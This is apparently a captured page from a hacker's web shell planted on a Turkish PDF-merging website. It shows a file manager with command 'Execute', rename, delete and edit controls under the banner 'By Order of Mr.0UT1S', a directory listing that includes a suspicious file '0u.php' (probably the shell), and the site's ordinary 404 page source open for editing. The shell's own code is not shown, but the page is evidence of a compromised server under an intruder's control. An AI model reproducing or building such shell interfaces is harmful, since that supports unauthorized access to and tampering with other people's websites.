home
/
aioutajg
/
pdfbirle.com
/
Go to Home Directory
+
Upload
Create File
root@0UT1S:~$
Execute
By Order of Mr.0UT1S
[DIR] ..
N/A
[DIR] assets
N/A
[DIR] composer_home
N/A
[DIR] homepage
N/A
[DIR] includes
N/A
[DIR] libs
N/A
[DIR] p
N/A
[DIR] uploads
N/A
[DIR] vendor
N/A
.htaccess
2.01 KB
Rename
Delete
0u.php
37.68 KB
Rename
Delete
1.install.php
1.69 KB
Rename
Delete
2.run_composer.php
643 bytes
Rename
Delete
404.php
2.45 KB
Rename
Delete
ads.txt
58 bytes
Rename
Delete
composer.json
97 bytes
Rename
Delete
composer.lock
5.07 KB
Rename
Delete
composer.phar
2.92 MB
Rename
Delete
error_log
6.21 KB
Rename
Delete
favicon.ico
198.52 KB
Rename
Delete
final turkish.zip
9.37 MB
Rename
Delete
index.php
2.50 KB
Rename
Delete
merge.php
781 bytes
Rename
Delete
sitemap.php
867 bytes
Rename
Delete
trgfrobots.txt
116 bytes
Rename
Delete
<?php // 404.php $page_title = "Sayfa Bulunamadı - PDF Birle | Ücretsiz PDF Birleştirme Aracı"; $page_description = "Oops! Aradığınız sayfa bulunamadı. Ana sayfaya dönün veya ücretsiz PDF birleştirme aracımızı kullanın."; $canonical_url = "https://www.pdfbirle.com/404"; // Canonical URL for this page ?> <!-- Header --> <?php include 'includes/header.php'; ?> <!DOCTYPE html> <html lang="tr"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <!-- Bootstrap CSS --> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet"> <!-- Custom CSS --> <link rel="stylesheet" href="../assets/css/style.css"> <!-- Adjusted path --> <!-- Bootstrap JS --> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script> </head> <body> <!-- 404 Error Section --> <section class="error-section py-5"> <div class="container"> <div class="row"> <div class="col-lg-8 mx-auto text-center"> <h1 class="display-1 mb-4">404</h1> <h2 class="display-4 mb-4">Sayfa Bulunamadı</h2> <p class="lead mb-4"> Oops! Aradığınız sayfa bulunamadı. Taşınmış veya silinmiş olabilir. </p> <!-- Search Bar --> <form class="d-flex justify-content-center mb-4" action="/search" method="GET"> <input type="text" class="form-control w-50" name="q" placeholder="PDF Birle'de ara..." aria-label="Ara"> <button type="submit" class="btn btn-primary ms-2">Ara</button> </form> <!-- Navigation Links --> <div class="mt-4"> <a href="/" class="btn btn-primary me-2">Ana Sayfaya Dön</a> <a href="/#pdf-birleştirme" class="btn btn-outline-primary">PDF Dosyalarını Birleştir</a> </div> </div> </div> </div> </section> <!-- Footer --> <?php include 'includes/footer.php'; ?> <!-- Bootstrap JS --> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script> <!-- Custom JS --> <script src="assets/js/script.js"></script> </body> </html>
Save